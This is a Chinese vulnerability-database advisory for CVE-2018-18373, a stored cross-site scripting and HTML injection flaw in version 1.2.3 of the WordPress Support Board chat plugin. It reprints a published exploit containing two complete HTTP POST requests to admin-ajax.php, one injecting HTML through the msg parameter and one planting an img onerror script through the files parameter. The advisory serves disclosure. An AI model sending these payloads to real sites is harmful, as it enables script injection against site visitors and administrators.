WordPress Support Board Plugin 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1354727 漏洞类型 跨站脚本
发布时间 2018-10-16 更新时间 2018-11-27
CVE编号 CVE-2018-18373 CNNVD-ID CNNVD-201810-733
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018100137
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-733
|漏洞详情
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Support Board Plugin是使用在其中的一个在线客服聊天插件。 WordPress Support Board Plugin 1.2.3版本中的文件上传区域存在跨站脚本漏洞。远程攻击者可借助‘msg’参数利用该漏洞注入任意的Web脚本或HTML。
|漏洞EXP
# Exploit Title: Support Board - PHP & Wordpress Plugin v1.2.3 - HTML Injection and Stored XSS
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : CVE-2018-18373

# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, a Stored XSS vulnerability has been discovered in file upload areas in the Chat and Help Desk sections via the msg parameter in a /wp-admin/admin-ajax.php sb_ajax_add_message action.

 
# HTTP POST Request : [HTML Injection]
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close

action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=

# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, the Stored XSS vulnerability has been discovered in
the HTML Injection vulnerability and file upload areas in the Chat and Help Desk sections of Schiocco.

# HTTP POST Request : [Stored XSS]
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close

action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=

|参考资料

来源:packetstormsecurity.com

链接:http://packetstormsecurity.com/files/149806/WordPress-Support-Board-1.2.3-Cross-Site-Scripting.html